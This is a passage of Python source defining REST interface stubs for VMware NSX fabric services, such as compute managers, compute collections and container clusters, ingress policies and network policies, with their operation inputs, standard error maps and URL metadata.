                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/fabric/compute-collection-fabric-templates',
            request_body_parameter='compute_collection_fabric_template',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'fabric_template_id': type.StringType(),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/fabric/compute-collection-fabric-templates/{fabric-template-id}',
            path_variables={
                'fabric_template_id': 'fabric-template-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'fabric_template_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/compute-collection-fabric-templates/{fabric-template-id}',
            path_variables={
                'fabric_template_id': 'fabric-template-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        list_input_type = type.StructType('operation-input', {
            'compute_collection_id': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/compute-collection-fabric-templates',
            path_variables={
            },
            query_parameters={
                'compute_collection_id': 'compute_collection_id',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'fabric_template_id': type.StringType(),
            'compute_collection_fabric_template': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/fabric/compute-collection-fabric-templates/{fabric-template-id}',
            request_body_parameter='compute_collection_fabric_template',
            path_variables={
                'fabric_template_id': 'fabric-template-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplateListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ComputeCollectionFabricTemplate'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.compute_collection_fabric_templates',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ComputeCollectionsStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.fabric.compute_collections service."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map; every operation on
            # this interface reports the same five error types.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- create: POST an action against one compute collection --------
        create_input_type = type.StructType('operation-input', {
            'cc_ext_id': type.StringType(),
            'action': type.OptionalType(type.StringType()),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/fabric/compute-collections/{cc-ext-id}',
            path_variables={'cc_ext_id': 'cc-ext-id'},
            query_parameters={'action': 'action'},
            content_type='application/json'
        )

        # --- get: read one compute collection by its external id ----------
        get_input_type = type.StructType('operation-input', {
            'cc_ext_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/compute-collections/{cc-ext-id}',
            path_variables={'cc_ext_id': 'cc-ext-id'},
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all compute collections ---
        list_input_type = type.StructType('operation-input', {
            'cm_local_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'discovered_node_id': type.OptionalType(type.StringType()),
            'display_name': type.OptionalType(type.StringType()),
            'external_id': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'node_id': type.OptionalType(type.StringType()),
            'origin_id': type.OptionalType(type.StringType()),
            'origin_type': type.OptionalType(type.StringType()),
            'owner_id': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/compute-collections',
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'cm_local_id', 'cursor', 'discovered_node_id', 'display_name',
                'external_id', 'included_fields', 'node_id', 'origin_id',
                'origin_type', 'owner_id', 'page_size', 'sort_ascending',
                'sort_by',
            )},
            content_type='application/json'
        )

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.VoidType(),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': _model('ComputeCollection'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ComputeCollectionListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.compute_collections',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ComputeManagersStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.fabric.compute_managers service."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map; all five operations
            # of this interface declare the same error set.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        _compute_manager_ref = 'ComputeManager'
        _base_url = '/api/v1/fabric/compute-managers'
        _item_url = _base_url + '/{compute-manager-id}'
        _id_path = {'compute_manager_id': 'compute-manager-id'}

        # --- create: POST a new compute manager registration ---------------
        create_input_type = type.StructType('operation-input', {
            'compute_manager': _model(_compute_manager_ref),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template=_base_url,
            request_body_parameter='compute_manager',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )

        # --- delete: remove one compute manager by id -----------------------
        delete_input_type = type.StructType('operation-input', {
            'compute_manager_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template=_item_url,
            path_variables=dict(_id_path),
            query_parameters={},
            content_type='application/json'
        )

        # --- get: read one compute manager by id ----------------------------
        get_input_type = type.StructType('operation-input', {
            'compute_manager_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=_item_url,
            path_variables=dict(_id_path),
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all compute managers --------
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'origin_type': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'server': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template=_base_url,
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'cursor', 'included_fields', 'origin_type', 'page_size',
                'server', 'sort_ascending', 'sort_by',
            )},
            content_type='application/json'
        )

        # --- update: PUT a full replacement of one compute manager ----------
        update_input_type = type.StructType('operation-input', {
            'compute_manager_id': type.StringType(),
            'compute_manager': _model(_compute_manager_ref),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template=_item_url,
            request_body_parameter='compute_manager',
            path_variables=dict(_id_path),
            query_parameters={},
            content_type='application/json'
        )

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': _model(_compute_manager_ref),
                'errors': _std_errors(),
                # Struct payloads in and out are field-checked.
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': _model(_compute_manager_ref),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ComputeManagerListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': _model(_compute_manager_ref),
                'errors': _std_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.compute_managers',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ContainerApplicationInstancesStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.fabric.container_application_instances."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map used by both ops.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- get: read one container application instance by id ------------
        get_input_type = type.StructType('operation-input', {
            'container_application_instance_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-application-instances/{container-application-instance-id}',
            path_variables={
                'container_application_instance_id':
                    'container-application-instance-id',
            },
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all instances ---------------
        list_input_type = type.StructType('operation-input', {
            'container_application_id': type.OptionalType(type.StringType()),
            'container_cluster_id': type.OptionalType(type.StringType()),
            'container_project_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-application-instances',
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'container_application_id', 'container_cluster_id',
                'container_project_id', 'cursor', 'included_fields',
                'page_size', 'sort_ascending', 'sort_by',
            )},
            content_type='application/json'
        )

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': _model('ContainerApplicationInstance'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ContainerApplicationInstanceListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_application_instances',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ContainerApplicationsStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.fabric.container_applications service."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map used by both ops.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- get: read one container application by id ----------------------
        get_input_type = type.StructType('operation-input', {
            'container_application_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-applications/{container-application-id}',
            path_variables={
                'container_application_id': 'container-application-id',
            },
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all container applications --
        list_input_type = type.StructType('operation-input', {
            'container_cluster_id': type.OptionalType(type.StringType()),
            'container_project_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-applications',
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'container_cluster_id', 'container_project_id', 'cursor',
                'included_fields', 'page_size', 'sort_ascending', 'sort_by',
            )},
            content_type='application/json'
        )

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': _model('ContainerApplication'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ContainerApplicationListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_applications',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ContainerClusterNodesStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.fabric.container_cluster_nodes service."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map used by both ops.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- get: read one container cluster node by id ---------------------
        get_input_type = type.StructType('operation-input', {
            'container_cluster_node_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-cluster-nodes/{container-cluster-node-id}',
            path_variables={
                'container_cluster_node_id': 'container-cluster-node-id',
            },
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all cluster nodes -----------
        list_input_type = type.StructType('operation-input', {
            'container_cluster_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-cluster-nodes',
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'container_cluster_id', 'cursor', 'included_fields',
                'page_size', 'sort_ascending', 'sort_by',
            )},
            content_type='application/json'
        )

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': _model('ContainerClusterNode'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ContainerClusterNodeListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_cluster_nodes',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ContainerClustersStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.fabric.container_clusters service."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map used by both ops.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- get: read one container cluster by id --------------------------
        get_input_type = type.StructType('operation-input', {
            'container_cluster_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-clusters/{container-cluster-id}',
            path_variables={
                'container_cluster_id': 'container-cluster-id',
            },
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all container clusters ------
        list_input_type = type.StructType('operation-input', {
            'cluster_type': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'infra_type': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-clusters',
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'cluster_type', 'cursor', 'included_fields', 'infra_type',
                'page_size', 'sort_ascending', 'sort_by',
            )},
            content_type='application/json'
        )

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': _model('ContainerCluster'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ContainerClusterListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_clusters',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ContainerIngressPoliciesStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.fabric.container_ingress_policies service."""
    def __init__(self, config):
        def _std_errors():
            # Fresh copy of the standard vAPI error map used by both ops.
            return {
                'com.vmware.vapi.std.errors.' + tail:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', err)
                for tail, err in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        def _model(name):
            # Shorthand for a reference into the NSX model bindings.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # --- get: read one container ingress policy by id -------------------
        get_input_type = type.StructType('operation-input', {
            'ingress_policy_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-ingress-policies/{ingress-policy-id}',
            path_variables={
                'ingress_policy_id': 'ingress-policy-id',
            },
            query_parameters={},
            content_type='application/json'
        )

        # --- list: paged, filterable query over all ingress policies --------
        list_input_type = type.StructType('operation-input', {
            'container_cluster_id': type.OptionalType(type.StringType()),
            'container_project_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-ingress-policies',
            path_variables={},
            # Wire names match the binding field names exactly for this op.
            query_parameters={name: name for name in (
                'container_cluster_id', 'container_project_id', 'cursor',
                'included_fields', 'page_size', 'sort_ascending', 'sort_by',
            )},
            content_type='application/json'
        )

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': _model('ContainerIngressPolicy'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': _model('ContainerIngressPolicyListResult'),
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_ingress_policies',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ContainerNetworkPoliciesStub(ApiInterfaceStub):
    def __init__(self, config):
        # Both operations on this interface declare the identical set of
        # standard vAPI errors; build a fresh mapping per operation so the
        # dict instances stay independent, exactly as the expanded form does.
        def _std_errors():
            return {
                'com.vmware.vapi.std.errors.' + suffix:
                    type.ReferenceType('com.vmware.vapi.std.errors_client', cls)
                for suffix, cls in (
                    ('service_unavailable', 'ServiceUnavailable'),
                    ('invalid_request', 'InvalidRequest'),
                    ('internal_server_error', 'InternalServerError'),
                    ('unauthorized', 'Unauthorized'),
                    ('not_found', 'NotFound'),
                )
            }

        # --- get operation ------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'network_policy_id': type.StringType(),
        })
        get_error_dict = _std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-network-policies/{network-policy-id}',
            path_variables={'network_policy_id': 'network-policy-id'},
            query_parameters={},
            content_type='application/json')

        # --- list operation -----------------------------------------------
        # Optional paging/filter fields; each one maps 1:1 onto a query
        # parameter of the same name.
        list_param_names = ('container_cluster_id', 'container_project_id',
                            'cursor', 'included_fields', 'page_size',
                            'sort_ascending', 'sort_by')
        list_input_type = type.StructType('operation-input', {
            'container_cluster_id': type.OptionalType(type.StringType()),
            'container_project_id': type.OptionalType(type.StringType()),
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = _std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = []
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/fabric/container-network-policies',
            path_variables={},
            query_parameters={name: name for name in list_param_names},
            content_type='application/json')

        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerNetworkPolicy'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ContainerNetworkPolicyListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.fabric.container_network_policies',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
